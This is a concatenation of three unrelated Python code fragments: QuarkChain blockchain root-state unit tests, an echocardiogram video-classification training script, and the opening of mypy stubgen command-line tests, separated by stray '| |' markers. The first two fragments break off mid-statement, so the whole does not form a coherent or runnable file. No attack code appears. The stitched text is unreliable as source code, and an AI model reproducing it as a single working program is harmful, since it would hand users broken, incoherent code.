add_minor_block_to_cluster(s_states, b1)
r_state.add_validated_minor_block_hash(
b0.header.get_hash(), b0.header.coinbase_amount_map.balance_map
)
r_state.add_validated_minor_block_hash(
b1.header.get_hash(), b1.header.coinbase_amount_map.balance_map
)
root_block = r_state.create_block_to_mine([b0.header, b1.header])
self.assertEqual(root_block.header.total_difficulty, 3000976)
self.assertTrue(r_state.add_block(root_block))
self.assertIsNone(r_state.get_root_block_by_height(3))
self.assertEqual(r_state.get_root_block_by_height(2), root_block)
self.assertEqual(r_state.get_root_block_by_height(None), root_block)
self.assertEqual(
r_state.get_root_block_by_height(1),
r_state.get_root_block_by_hash(root_block.header.hash_prev_block),
)
self.assertTrue(s_state0.add_root_block(root_block))
self.assertEqual(s_state0.root_tip, root_block.header)
self.assertTrue(s_state1.add_root_block(root_block))
self.assertEqual(s_state1.root_tip, root_block.header)
def test_root_state_add_block_no_proof_of_progress(self):
env = get_test_env()
r_state, s_states = create_default_state(env)
s_state0 = s_states[2 | 0]
s_state1 = s_states[2 | 1]
b0 = s_state0.create_block_to_mine()
s_state0.finalize_and_add_block(b0)
b1 = s_state1.create_block_to_mine()
s_state1.finalize_and_add_block(b1)
r_state.add_validated_minor_block_hash(
b0.header.get_hash(), b0.header.coinbase_amount_map.balance_map
)
r_state.add_validated_minor_block_hash(
b1.header.get_hash(), b1.header.coinbase_amount_map.balance_map
)
root_block = r_state.create_block_to_mine([])
self.assertTrue(r_state.add_block(root_block))
root_block = r_state.create_block_to_mine([b0.header])
self.assertTrue(r_state.add_block(root_block))
root_block = r_state.create_block_to_mine([b1.header])
self.assertTrue(r_state.add_block(root_block))
def test_root_state_add_two_blocks(self):
env = get_test_env()
r_state, s_states = create_default_state(env)
s_state0 = s_states[2 | 0]
s_state1 = s_states[2 | 1]
b0 = s_state0.create_block_to_mine()
add_minor_block_to_cluster(s_states, b0)
b1 = s_state1.create_block_to_mine()
add_minor_block_to_cluster(s_states, b1)
r_state.add_validated_minor_block_hash(
b0.header.get_hash(), b0.header.coinbase_amount_map.balance_map
)
r_state.add_validated_minor_block_hash(
b1.header.get_hash(), b1.header.coinbase_amount_map.balance_map
)
root_block0 = r_state.create_block_to_mine([b0.header, b1.header])
self.assertTrue(r_state.add_block(root_block0))
b2 = s_state0.create_block_to_mine()
add_minor_block_to_cluster(s_states, b2)
b3 = s_state1.create_block_to_mine()
add_minor_block_to_cluster(s_states, b3)
r_state.add_validated_minor_block_hash(
b2.header.get_hash(), b2.header.coinbase_amount_map.balance_map
)
r_state.add_validated_minor_block_hash(
b3.header.get_hash(), b3.header.coinbase_amount_map.balance_map
)
root_block1 = r_state.create_block_to_mine([b2.header, b3.header])
self.assertTrue(r_state.add_block(root_block1))
def test_root_state_and_shard_state_fork(self):
env = get_test_env()
r_state, s_states = create_default_state(env)
s_state0 = s_states[2 | 0]
s_state1 = s_states[2 | 1]
b0 = s_state0.create_block_to_mine()
b2 = s_state0.create_block_to_mine()
add_minor_block_to_cluster(s_states, b0)
b1 = s_state1.create_block_to_mine()
b3 = s_state1.create_block_to_mine()
add_minor_block_to_cluster(s_states, b1)
r_state.add_validated_minor_block_hash(
b0.header.get_hash(), b0.header.coinbase_amount_map.balance_map
)
r_state.add_validated_minor_block_hash(
b1.header.get_hash(), b1.header.coinbase_amount_map.balance_map
)
root_block0 = r_state.create_block_to_mine([b0.header, b1.header])
root_block1 = r_state.create_block_to_mine([])
self.assertTrue(r_state.add_block(root_block0))
self.assertTrue(s_state0.add_root_block(root_block0))
self.assertTrue(s_state1.add_root_block(root_block0))
add_minor_block_to_cluster(s_states, b2)
add_minor_block_to_cluster(s_states, b3)
r_state.add_validated_minor_block_hash(
b2.header.get_hash(), b2.header.coinbase_amount_map.balance_map
)
r_state.add_validated_minor_block_hash(
b3.header.get_hash(), b3.header.coinbase_amount_map.balance_map
)
root_block1.add_minor_block_header(b2.header).add_minor_block_header(
b3.header
).finalize(
coinbase_tokens=r_state._calculate_root_block_coinbase(
[header.get_hash() for header in root_block1.minor_block_header_list],
root_block1.header.height,
)
)
self.assertFalse(r_state.add_block(root_block1))
self.assertFalse(s_state0.add_root_block(root_block1))
self.assertFalse(s_state1.add_root_block(root_block1))
b4 = b2.create_block_to_append()
b5 = b3.create_block_to_append()
add_minor_block_to_cluster(s_states, b4)
add_minor_block_to_cluster(s_states, b5)
r_state.add_validated_minor_block_hash(
b4.header.get_hash(), b4.header.coinbase_amount_map.balance_map
)
r_state.add_validated_minor_block_hash(
b5.header.get_hash(), b5.header.coinbase_amount_map.balance_map
)
root_block2 = (
root_block1.create_block_to_append()
.add_minor_block_header(b4.header)
.add_minor_block_header(b5.header)
)
root_block2.finalize(
coinbase_tokens=r_state._calculate_root_block_coinbase(
[header.get_hash() for header in root_block2.minor_block_header_list],
root_block2.header.height,
)
)
self.assertTrue(r_state.add_block(root_block2))
self.assertTrue(s_state0.add_root_block(root_block2))
self.assertTrue(s_state1.add_root_block(root_block2))
self.assertEqual(r_state.tip, root_block2.header)
self.assertEqual(s_state0.root_tip, root_block2.header)
self.assertEqual(s_state1.root_tip, root_block2.header)
def test_root_state_difficulty_and_coinbase(self):
env = get_test_env()
env.quark_chain_config.SKIP_ROOT_DIFFICULTY_CHECK = False
env.quark_chain_config.ROOT.GENESIS.DIFFICULTY = 1000
diff_calc = EthDifficultyCalculator(cutoff=9, diff_factor=2048, minimum_diff=1)
env.quark_chain_config.NETWORK_ID = (
1
) # other network ids will skip difficulty check
env.quark_chain_config.REWARD_TAX_RATE = 0.8
env.quark_chain_config.ROOT.COINBASE_AMOUNT = 5
for c in env.quark_chain_config.shards.values():
c.COINBASE_AMOUNT = 5
r_state, s_states = create_default_state(env, diff_calc=diff_calc)
s_state0 = s_states[2 | 0]
s_state1 = s_states[2 | 1]
g0 = s_state0.header_tip
b0 = s_state0.get_tip().create_block_to_append()
add_minor_block_to_cluster(s_states, b0)
g1 = s_state1.header_tip
b1 = s_state1.get_tip().create_block_to_append()
add_minor_block_to_cluster(s_states, b1)
self.assertEqual(
b0.header.coinbase_amount_map.balance_map,
{env.quark_chain_config.genesis_token: 1},
)
self.assertEqual(
b1.header.coinbase_amount_map.balance_map,
{env.quark_chain_config.genesis_token: 1},
)
r_state.add_validated_minor_block_hash(
b0.header.get_hash(), b0.header.coinbase_amount_map.balance_map
)
r_state.add_validated_minor_block_hash(
b1.header.get_hash(), b1.header.coinbase_amount_map.balance_map
)
# Test coinbase
original_reward_tax_rate = env.quark_chain_config.REWARD_TAX_RATE
for tax_rate in [0.8, 0.6, 0.9]:
env.quark_chain_config.REWARD_TAX_RATE = tax_rate
root_block_tmp = r_state.create_block_to_mine(
m_header_list=[b0.header, b1.header],
address=Address.create_empty_account(),
create_time=r_state.tip.create_time + 9,
)
self.assertEqual(root_block_tmp.header.signature, bytes(65)) # empty sig
# still use minor block's coinbase amount, 1
self.assertEqual(
root_block_tmp.header.coinbase_amount_map.balance_map[
env.quark_chain_config.genesis_token
],
round((1 + 1) / (1 - tax_rate) * tax_rate + 5),
)
env.quark_chain_config.REWARD_TAX_RATE = original_reward_tax_rate
# Check new difficulty
root_block0 = r_state.create_block_to_mine(
m_header_list=[b0.header, b1.header],
address=Address.create_empty_account(),
create_time=r_state.tip.create_time + 9,
)
self.assertEqual(r_state.tip.difficulty, root_block0.header.difficulty)
root_block0 = r_state.create_block_to_mine(
m_header_list=[b0.header, b1.header],
address=Address.create_empty_account(),
create_time=r_state.tip.create_time + 3,
)
self.assertEqual(
r_state.tip.difficulty + r_state.tip.difficulty // 2048,
root_block0.header.difficulty,
)
root_block0 = r_state.create_block_to_mine(
m_header_list=[g0, b0.header, g1, b1.header],
address=Address.create_empty_account(),
create_time=r_state.tip.create_time + 26,
)
self.assertEqual(
r_state.tip.difficulty - r_state.tip.difficulty // 2048,
root_block0.header.difficulty,
)
def test_root_state_recovery(self):
env = get_test_env()
r_state, s_states = create_default_state(env)
s_state0 = s_states[2 | 0]
s_state1 = s_states[2 | 1]
b0 = s_state0.create_block_to_mine()
add_minor_block_to_cluster(s_states, b0)
b1 = s_state1.create_block_to_mine()
add_minor_block_to_cluster(s_states, b1)
r_state.add_validated_minor_block_hash(
b0.header.get_hash(), b0.header.coinbase_amount_map.balance_map
)
r_state.add_validated_minor_block_hash(
b1.header.get_hash(), b1.header.coinbase_amount_map.balance_map
)
root_block0 = r_state.create_block_to_mine([b0.header, b1.header])
root_block00 = r_state.create_block_to_mine([b0.header, b1.header])
self.assertTrue(r_state.add_block(root_block0))
# create a fork
root_block00.header.create_time += 1
root_block00.finalize(
coinbase_tokens=r_state._calculate_root_block_coinbase(
[header.get_hash() for header in root_block00.minor_block_header_list],
root_block00.header.height,
)
)
self.assertNotEqual(
root_block0.header.get_hash(), root_block00.header.get_hash()
)
self.assertFalse(r_state.add_block(root_block00))
self.assertEqual(
r_state.db.get_root_block_by_hash(root_block00.header.get_hash()),
root_block00,
)
b2 = s_state0.create_block_to_mine()
add_minor_block_to_cluster(s_states, b2)
b3 = s_state1.create_block_to_mine()
add_minor_block_to_cluster(s_states, b3)
r_state.add_validated_minor_block_hash(
b2.header.get_hash(), b2.header.coinbase_amount_map.balance_map
)
r_state.add_validated_minor_block_hash(
b3.header.get_hash(), b3.header.coinbase_amount_map.balance_map
)
root_block1 = r_state.create_block_to_mine([b2.header, b3.header])
self.assertTrue(r_state.add_block(root_block1))
# now the longest chain is root_block0 <-- root_block1
# but root_block0 will become the new tip after recovery
recovered_state = RootState(env=env)
self.assertEqual(recovered_state.tip, root_block0.header)
self.assertEqual(recovered_state.db.get_root_block_by_height(2), root_block0)
self.assertEqual(recovered_state.get_root_block_by_height(None), root_block0)
# fork is pruned from recovered state
self.assertIsNone(
recovered_state.db.get_root_block_by_hash(root_block00.header.get_hash())
)
self.assertEqual(
recovered_state.db.get_root_block_by_hash(
root_block00.header.get_hash(), consistency_check=False
),
root_block00,
)
def test_add_root_block_with_minor_block_with_wrong_root_block_hash(self):
""" Test for the following case
+--+ +--+
|r1|<---|r3|
/+--+ +--+
/ | |
+--+ / +--+ +--+
|r0|<----|m1|<---|m2|
+--+ \ +--+ +--+
\ | |
\+--+ |
|r2|<----+
+--+
where r3 is invalid because m2 depends on r2, which is not in the r3 chain.
"""
env = get_test_env(shard_size=1)
r_state, s_states = create_default_state(env)
s_state0 = s_states[1 | 0]
root_block0 = r_state.get_tip_block()
m1 = s_state0.get_tip().create_block_to_append()
add_minor_block_to_cluster(s_states, m1)
r_state.add_validated_minor_block_hash(
m1.header.get_hash(), m1.header.coinbase_amount_map.balance_map
)
root_block1 = root_block0.create_block_to_append(
nonce=0
).add_minor_block_header(m1.header)
root_block1.finalize(
coinbase_tokens=r_state._calculate_root_block_coinbase(
[header.get_hash() for header in root_block1.minor_block_header_list],
root_block1.header.height,
)
)
root_block2 = root_block0.create_block_to_append(
nonce=1
).add_minor_block_header(m1.header)
root_block2.finalize(
coinbase_tokens=r_state._calculate_root_block_coinbase(
[header.get_hash() for header in root_block2.minor_block_header_list],
root_block2.header.height,
)
)
self.assertTrue(r_state.add_block(root_block1))
self.assertFalse(r_state.add_block(root_block2))
self.assertTrue(s_state0.add_root_block(root_block1))
self.assertFalse(s_state0.add_root_block(root_block2))
m2 = m1.create_block_to_append()
m2.header.hash_prev_root_block = root_block2.header.get_hash()
add_minor_block_to_cluster(s_states, m2)
r_state.add_validated_minor_block_hash(
m2.header.get_hash(), m2.header.coinbase_amount_map.balance_map
)
root_block3 = root_block1.create_block_to_append().add_minor_block_header(
m2.header
)
root_block3.finalize(
coinbase_tokens=r_state._calculate_root_block_coinbase(
[header.get_hash() for header in root_block3.minor_block_header_list],
root_block3.header.height,
)
)
with self.assertRaises(ValueError):
r_state.add_block(root_block3)
root_block4 = root_block2.create_block_to_append().add_minor_block_header(
m2.header
)
root_block4.finalize(
coinbase_tokens=r_state._calculate_root_block_coinbase(
[header.get_hash() for header in root_block4.minor_block_header_list],
root_block4.header.height,
)
)
self.assertTrue(r_state.add_block(root_block4))
def test_add_minor_block_with_wrong_root_block_hash(self):
""" Test for the following case
+--+
|r1|
/+--+
/ |
+--+ / +--+ +--+
|r0|<----|m1|<---|m3|
+--+ \ +--+ +--+
^ \ |
| \+--+ |
| |r2|<----+
| +--+
| |
| +--+
+------|m2|
+--+
where m3 is invalid because m3 depends on r2, whose minor chain is not the same chain as m3
"""
env = get_test_env(shard_size=1)
r_state, s_states = create_default_state(env)
s_state0 = s_states[1 | 0]
root_block0 = r_state.get_tip_block()
m1 = s_state0.get_tip().create_block_to_append(nonce=0)
m2 = s_state0.get_tip().create_block_to_append(nonce=1)
add_minor_block_to_cluster(s_states, m1)
add_minor_block_to_cluster(s_states, m2)
r_state.add_validated_minor_block_hash(
m1.header.get_hash(), m1.header.coinbase_amount_map.balance_map
)
r_state.add_validated_minor_block_hash(
m2.header.get_hash(), m2.header.coinbase_amount_map.balance_map
)
root_block1 = root_block0.create_block_to_append(
nonce=0
).add_minor_block_header(m1.header)
root_block1.finalize(
coinbase_tokens=r_state._calculate_root_block_coinbase(
[header.get_hash() for header in root_block1.minor_block_header_list],
root_block1.header.height,
)
)
root_block2 = root_block0.create_block_to_append(
nonce=1
).add_minor_block_header(m2.header)
root_block2.finalize(
coinbase_tokens=r_state._calculate_root_block_coinbase(
[header.get_hash() for header in root_block2.minor_block_header_list],
root_block2.header.height,
)
)
self.assertTrue(r_state.add_block(root_block1))
self.assertFalse(r_state.add_block(root_block2))
self.assertTrue(s_state0.add_root_block(root_block1))
self.assertFalse(s_state0.add_root_block(root_block2))
m3 = m1.create_block_to_append()
m3.header.hash_prev_root_block = root_block2.header.get_hash()
with self.assertRaises(ValueError):
add_minor_block_to_cluster(s_states, m3)
m4 = m1.create_block_to_append()
m4.header.hash_prev_root_block = root_block1.header.get_hash()
add_minor_block_to_cluster(s_states, m4)
# Test recovery
s_state0_recovered = ShardState(env, full_shard_id=1 | 0, db=s_state0.raw_db)
s_state0_recovered.init_from_root_block(root_block1)
with self.assertRaises(ValueError):
add_minor_block_to_cluster(s_states, m3)
def test_root_state_add_root_block_too_many_minor_blocks(self):
env = get_test_env()
r_state, s_states = create_default_state(env)
s_state0 = s_states[2 | 0]
headers = []
max_mblock_in_rblock = (
s_state0.shard_config.max_blocks_per_shard_in_one_root_block
)
for i in range(max_mblock_in_rblock + 1):
b = s_state0.create_block_to_mine()
add_minor_block_to_cluster(s_states, b)
headers.append(b.header)
r_state.add_validated_minor_block_hash(
b.header.get_hash(), b.header.coinbase_amount_map.balance_map
)
root_block = r_state.create_block_to_mine(
m_header_list=headers, create_time=headers[-1].create_time + 1
)
with self.assertRaisesRegexp(
ValueError, "too many minor blocks in the root block for shard"
):
r_state.add_block(root_block)
headers = headers[:max_mblock_in_rblock]
root_block = r_state.create_block_to_mine(
m_header_list=headers, create_time=headers[-1].create_time + 1
)
r_state.add_block(root_block)
def test_root_chain_fork_using_largest_total_diff(self):
env = get_test_env(shard_size=1)
r_state, s_states = create_default_state(env)
coinbase = r_state._calculate_root_block_coinbase([], 0)
rb0 = r_state.get_tip_block()
# one fork with more blocks but small total diff
rb1 = rb0.create_block_to_append(difficulty=int(1e6)).finalize(coinbase)
rb2 = rb1.create_block_to_append(difficulty=int(1e6)).finalize(coinbase)
# another fork with less blocks but higher total diff
rb3 = rb0.create_block_to_append(difficulty=int(3e6)).finalize(coinbase)
# rb3 should be added as the tip
self.assertTrue(r_state.add_block(rb1))
self.assertTrue(r_state.add_block(rb2))
self.assertTrue(r_state.add_block(rb3))
self.assertEqual(r_state.tip.get_hash(), rb3.header.get_hash())
def test_root_coinbase_decay(self):
env = get_test_env()
r_state, s_states = create_default_state(env)
coinbase = r_state._calculate_root_block_coinbase(
[], env.quark_chain_config.ROOT.EPOCH_INTERVAL
)
self.assertEqual(
coinbase,
{
env.quark_chain_config.genesis_token: env.quark_chain_config.ROOT.COINBASE_AMOUNT
* env.quark_chain_config.BLOCK_REWARD_DECAY_FACTOR
},
)
coinbase = r_state._calculate_root_block_coinbase(
[], env.quark_chain_config.ROOT.EPOCH_INTERVAL + 1
)
self.assertEqual(
coinbase,
{
env.quark_chain_config.genesis_token: env.quark_chain_config.ROOT.COINBASE_AMOUNT
* env.quark_chain_config.BLOCK_REWARD_DECAY_FACTOR
},
)
coinbase = r_state._calculate_root_block_coinbase(
[], env.quark_chain_config.ROOT.EPOCH_INTERVAL * 2
)
self.assertEqual(
coinbase,
{
env.quark_chain_config.genesis_token: env.quark_chain_config.ROOT.COINBASE_AMOUNT
* env.quark_chain_config.BLOCK_REWARD_DECAY_FACTOR ** | |
"""Functions for training and running group classification."""
import math
import os
import time
import datetime
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from sklearn.utils.extmath import softmax
from scipy.special import expit
from sklearn.metrics import f1_score, fbeta_score, classification_report, confusion_matrix, average_precision_score, roc_auc_score
import sklearn
import torch
import torchvision
import tqdm
import pdb
import hha
def run(num_epochs=100,
file_list='FileList_hha_firstEncountersValTest.csv',
modelname="r2plus1d_18",
tasks="Group",
frames=32,
period=2,
pretrained=True,
output=None,
device=None,
n_train_patients=None,
num_workers=5,
batch_size=20,
seed=0,
lr_step_period=15,
run_test=False,
binary=True,
nodes=1,
bias=None,
weighted=False,
oversample=False,
optimizer=None,
rank_auprc=False,
singleframe=False,
singleframe_ed=False,
segmentation_mask=False,
segmentation_mask_invert=False,
downsample=None,
segmentation=False,
segmentation_outline=False,
segmentation_params=None,
loss_funct=None
):
"""Trains/tests classification model.
Args:
num_epochs (int, optional): Number of epochs during training
Defaults to 45.
modelname (str, optional): Name of model. One of ``mc3_18'',
``r2plus1d_18'', or ``r3d_18''
(options are torchvision.models.video.<modelname>)
Defaults to ``r2plus1d_18''.
tasks (str, optional): Name of task to predict. Options are the headers
of FileList.csv.
Defaults to ``group''.
pretrained (bool, optional): Whether to use pretrained weights for model
Defaults to True.
output (str or None, optional): Name of directory to place outputs
Defaults to None (replaced by output/video/<modelname>_<pretrained/random>/).
device (str or None, optional): Name of device to run on. See
https://pytorch.org/docs/stable/tensor_attributes.html#torch.torch.device
for options. If ``None'', defaults to ``cuda'' if available, and ``cpu'' otherwise.
Defaults to ``None''.
n_train_patients (str or None, optional): Number of training patients. Used to ablations
on number of training patients. If ``None'', all patients used.
Defaults to ``None''.
num_workers (int, optional): how many subprocesses to use for data
loading. If 0, the data will be loaded in the main process.
Defaults to 5.
binary (bool, required): Whether to train binary classification
Defaults to True.
batch_size (int, optional): how many samples per batch to load
Defaults to 20.
seed (int, optional): Seed for random number generator.
Defaults to 0.
lr_step_period (int or None, optional): Period of learning rate decay
(learning rate is decayed by a multiplicative factor of 0.1)
If ``None'', learning rate is not decayed.
Defaults to 15.
run_test (bool, optional): Whether or not to run on test.
Defaults to False.
nodes (int, required): numbers of nodes, representing number of classes,
Defaults to 1, for binary case.
bias (float, optional): Add bias to final layer of model, default: 0.0
weighted (bool, optional): Decides whether or not to weigh classes during training, default: False
optimizer (str, optional): What optimizer to use, default: False
singleframe
singleframe_ed=False,
segmentation_mask=False,
segmentation_mask_invert=False,
downsample=None
"""
## Seed RNGs
np.random.seed(seed)
torch.manual_seed(seed)
## Setting default output directory
print(output)
if output is not None:
output = os.path.join(output, "video", "{}_{}_{}_{}_{}_{}_{}_{}".format(modelname,
frames,
period,
"pretrained" if pretrained else "random",
"weighted" if weighted else "nonweighted",
"oversampled" if oversample else "nonoversampled",
"bias" if bias else "nobias",
"SGD" if optimizer == 'SGD' else "adam",
))
else:
output = os.path.join('output', "video", "{}_{}_{}_{}_{}_{}_{}_{}".format(modelname,
frames,
period,
"pretrained" if pretrained else "random",
"weighted" if weighted else "nonweighted",
"oversampled" if oversample else "nonoversampled",
"bias" if bias else "nobias",
"SGD" if optimizer == 'SGD' else "adam",
))
# Augmentation studies
if singleframe:
output += "_singleframeRandom"
if singleframe_ed:
output += "_singleframeEndDiastolic"
if segmentation_mask:
output += "_segmentationmask"
if segmentation_mask_invert:
output += "_segmentationmaskInvert"
if downsample:
output += "_downsample" + str(downsample)
if segmentation:
output += "_segmentation"
if segmentation_outline:
output += "_segmentationOutline"
if segmentation_params is not None:
output += "segmentationParams"
### Making directory is does not exist
os.makedirs(output, exist_ok=True)
## Setting device for computations
if device is None:
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
## Setting up model
model = torchvision.models.video.__dict__[modelname](pretrained=pretrained)
## Adding last layer of nodes
node = nodes
model.fc = torch.nn.Linear(model.fc.in_features, node)
## Initializing well:atural log(pos/neg) for final bias term #natural log(pos/total) for final bias term
if bias:
if nodes == 1:
bias_terms = [-0.48] #bias_wt #[-0.48]
model.fc.bias.data = torch.tensor(bias_terms)
## TODO: Add an option for normal bias setting etc
if nodes == 3:
bias_terms = [0.0, -0.48, -3.92]
model.fc.bias.data = torch.tensor(bias_terms)
if not bias:
bias_terms = [0.0] * nodes
model.fc.bias.data = torch.tensor(bias_terms)
#pdb.set_trace()
## Implementing data parallelism at the module level.
if device.type == "cuda":
model = torch.nn.DataParallel(model)
model.to(device)
# Set up optimizer: Default sgd
optim = torch.optim.SGD(model.parameters(), lr=1e-3, momentum=0.9, weight_decay=1e-3)
if lr_step_period is None:
lr_step_period = math.inf
scheduler = torch.optim.lr_scheduler.StepLR(optim, lr_step_period)
if optimizer == 'adam':
learning_rate = 1e-4
optim = torch.optim.Adam(model.parameters(), lr=learning_rate)
print(optimizer)
## Computing mean and std
print(file_list)
mean, std = hha.utils.get_mean_and_std(hha.datasets.Echo(split="train", file_list=file_list))
kwargs = {"target_type": tasks,
"mean": mean,
"std": std,
"length": frames,
"period": period,
"file_list":file_list,
"singleframe":singleframe,
"singleframe_ed": singleframe_ed,
"segmentation_mask":segmentation_mask,
"segmentation_mask_invert": segmentation_mask_invert,
"downsample": downsample,
"segmentation_outline":segmentation_outline
}
#if segmentation_params is not None:
# kwargs['segmentation_params']={"mask": True, "mitral": False, "expand": 15, "rect":True, "reverse":True}
## Setting up datasets and dataloaders
train_dataset = hha.datasets.Echo(split="train", **kwargs, pad=12)
if singleframe:
## Testing for a truly single frame video
sfv = train_dataset.__getitem__(0)
assert np.array_equal(sfv[0][:,np.random.choice(sfv[0].shape[1], 1),:,:], sfv[0][:,np.random.choice(sfv[0].shape[1], 1),:,:])
if n_train_patients is not None and len(train_dataset) > n_train_patients:
# Subsample patients (used for ablation experiment)
indices = np.random.choice(len(train_dataset), n_train_patients, replace=False)
train_dataset = torch.utils.data.Subset(train_dataset, indices)
train_dataloader = torch.utils.data.DataLoader(train_dataset
, batch_size=batch_size
, num_workers=num_workers
, shuffle=True
, pin_memory=(device.type == "cuda")
, drop_last=True)
val_dataloader = torch.utils.data.DataLoader(hha.datasets.Echo(split="validate", **kwargs)
, batch_size=batch_size
, num_workers=num_workers
, shuffle=True
, pin_memory=(device.type == "cuda"))
dataloaders = {'train': train_dataloader, 'validate': val_dataloader}
if oversample and not weighted:
#############
# Oversample the minority classes
outcome = train_dataset.outcome
targets = [j[1] for j in outcome ]
class_count = np.unique(targets, return_counts=True)[1]
print(class_count)
weight = 1. / class_count
samples_weight = torch.from_numpy(np.array([weight[int(float(t))] for t in targets]))
sampler = torch.utils.data.sampler.WeightedRandomSampler(samples_weight, len(samples_weight)) #len(samples_weight))
weighted_loader = torch.utils.data.DataLoader(train_dataset
, batch_size=batch_size
, num_workers=num_workers
, shuffle=False
, pin_memory=(device.type == "cuda")
, drop_last=True
, sampler=sampler)
dataloaders = {'train': weighted_loader, 'validate': val_dataloader}
#############
# Run training and testing loops
with open(os.path.join(output, "log.csv"), "a") as f:
epoch_resume = 0
bestLoss = float("inf")
bestauPRC = float(0.)
try:
# Attempt to load checkpoint
checkpoint = torch.load(os.path.join(output, "checkpoint.pt"))
model.load_state_dict(checkpoint['state_dict'])
optim.load_state_dict(checkpoint['opt_dict'])
scheduler.load_state_dict(checkpoint['scheduler_dict'])
epoch_resume = checkpoint["epoch"] + 1
bestLoss = checkpoint["best_loss"]
f.write("Resuming from epoch {}\n".format(epoch_resume))
except FileNotFoundError:
f.write("Starting run from scratch\n")
for epoch in range(epoch_resume, num_epochs):
print("Epoch #{}".format(epoch), flush=True)
for phase in ['train', 'validate']:
start_time = time.time()
for i in range(torch.cuda.device_count()):
torch.cuda.reset_max_memory_allocated(i)
torch.cuda.reset_max_memory_cached(i)
## Running current epoch
loss, yhat, y, epoch_metrics, __ = hha.utils.video_dev.run_epoch(model
, dataloaders[phase]
, phase == "train"
, optim
, device
, binary=binary
, weighted=weighted
, loss_funct=loss_funct)
## Writing to file
if binary:
threshold = 0.5
yhat = expit(yhat)
metrics_predictions_ndx = 1
predictions = epoch_metrics[:, metrics_predictions_ndx]
calculated_metrics = pd.DataFrame(log_epoch_metrics(epoch_metrics))
print(roc_auc_score(y, yhat, average='weighted'))
print(average_precision_score(y, yhat, average='weighted'))
auprc = average_precision_score(y, yhat, average='weighted')
f.write("{},{},{},{},{},{},{},{},{},{},{},{},{},{},{}\n".format(epoch
, phase
, loss
, calculated_metrics['0.0']['loss']
, calculated_metrics['1.0']['loss']
, f1_score(y, predictions, average='weighted')
, calculated_metrics['0.0']['f1-score']
, calculated_metrics['1.0']['f1-score']
, roc_auc_score(y, yhat, average='weighted')
, average_precision_score(y, yhat, average='weighted')
, time.time() - start_time
, y.size
, sum(torch.cuda.max_memory_allocated() for i in range(torch.cuda.device_count()))
, sum(torch.cuda.max_memory_cached() for i in range(torch.cuda.device_count()))
, batch_size))
else:
yhat = softmax(yhat)
metrics_predictions_ndx = 1
predictions = epoch_metrics[:, metrics_predictions_ndx]
y_encode = np.eye(np.int(y.max()+1))[y.astype(int)]
calculated_metrics = pd.DataFrame(log_epoch_metrics(epoch_metrics))
print(roc_auc_score(y_encode, yhat, average='weighted'))
print(average_precision_score(y_encode, yhat , average='weighted'))
auprc = average_precision_score(y_encode, yhat, average='weighted')
per_class_loss = calculated_metrics[[str(j) for j in np.arange(0, nodes).astype(float)]].loc['loss'].values.tolist()
per_class_f1score = calculated_metrics[[str(j) for j in np.arange(0, nodes).astype(float)]].loc['f1-score'].values.tolist()
line_out = [epoch, phase, loss] + per_class_loss + [f1_score(y, predictions, average='weighted')] + per_class_f1score + [roc_auc_score(y_encode, yhat, average='weighted')] + [average_precision_score(y_encode, yhat, average='weighted')] + [time.time() - start_time] + [y.size] + [sum(torch.cuda.max_memory_allocated() for i in range(torch.cuda.device_count()))] + [sum(torch.cuda.max_memory_cached() for i in range(torch.cuda.device_count()))] + [batch_size]
f.write(",".join(str(np.round(x,4)) if isinstance(x, np.float32) else str(x) for x in line_out) + '\n')
f.flush()
scheduler.step()
# Save checkpoint
save = {
'epoch': epoch,
'state_dict': model.state_dict(),
'period': period,
'frames': frames,
'best_loss': bestLoss,
'loss': loss,
'auprc': auprc,
'opt_dict': optim.state_dict(),
'scheduler_dict': scheduler.state_dict(),
}
torch.save(save, os.path.join(output, "checkpoint.pt"))
if loss < bestLoss:
torch.save(save, os.path.join(output, "best.pt"))
bestLoss = loss
if auprc > bestauPRC:
torch.save(save, os.path.join(output, "best_auprc.pt"))
bestauPRC = auprc
if rank_auprc:
# Loading best weights for highest auPRC
checkpoint = torch.load(os.path.join(output, "best_auprc.pt"), map_location=device)
print(os.path.join(output, "best_auprc.pt"))
model.load_state_dict(checkpoint['state_dict'])
optim.load_state_dict(checkpoint['opt_dict'])
scheduler.load_state_dict(checkpoint['scheduler_dict'])
for state in optim.state.values():
for k, v in state.items():
if isinstance(v, torch.Tensor):
state[k] = v.to(device)
f.write("Best auPRC {} from epoch {}\n".format(checkpoint["auprc"], checkpoint["epoch"]))
f.flush()
else:
# Loading best weights according to lowest loss
checkpoint = torch.load(os.path.join(output, "best.pt"))
print(os.path.join(output, "best.pt"))
model.load_state_dict(checkpoint['state_dict'])
f.write("Best validation loss {} from | |
import glob
import os.path
import shutil
import sys
import tempfile
import re
from types import ModuleType
from typing import List, Tuple
from mypy.test.helpers import Suite, assert_equal, assert_string_arrays_equal
from mypy.test.data import DataSuite, DataDrivenTestCase
from mypy.errors import CompileError
from mypy.stubgen import (
generate_stubs, parse_options, walk_packages, Options, collect_build_targets,
mypy_options
)
from mypy.stubgenc import generate_c_type_stub, infer_method_sig, generate_c_function_stub
from mypy.stubdoc import (
parse_signature, parse_all_signatures, build_signature, find_unique_signatures,
infer_sig_from_docstring, infer_prop_type_from_docstring, FunctionSig, ArgSig,
infer_arg_sig_from_docstring
)
class StubgenCmdLineSuite(Suite):
def test_files_found(self) -> None:
current = os.getcwd()
with tempfile.TemporaryDirectory() as tmp:
try:
os.chdir(tmp)
os.mkdir('subdir')
self.make_file('subdir', 'a.py')
self.make_file('subdir', 'b.py')
os.mkdir(os.path.join('subdir', 'pack'))
self.make_file('subdir', 'pack', '__init__.py')
opts = parse_options(['subdir'])
py_mods, c_mods = collect_build_targets(opts, mypy_options(opts))
assert_equal(c_mods, [])
files = {mod.path for mod in py_mods}
assert_equal(files, {os.path.join('subdir', 'pack', '__init__.py'),
os.path.join('subdir', 'a.py'),
os.path.join('subdir', 'b.py')})
finally:
os.chdir(current)
def test_packages_found(self) -> None:
current = os.getcwd()
with tempfile.TemporaryDirectory() as tmp:
try:
os.chdir(tmp)
os.mkdir('pack')
self.make_file('pack', '__init__.py', content='from . import a, b')
self.make_file('pack', 'a.py')
self.make_file('pack', 'b.py')
opts = parse_options(['-p', 'pack'])
py_mods, c_mods = collect_build_targets(opts, mypy_options(opts))
assert_equal(c_mods, [])
files = {os.path.relpath(mod.path or 'FAIL') for mod in py_mods}
assert_equal(files, {os.path.join('pack', '__init__.py'),
os.path.join('pack', 'a.py'),
os.path.join('pack', 'b.py')})
finally:
os.chdir(current)
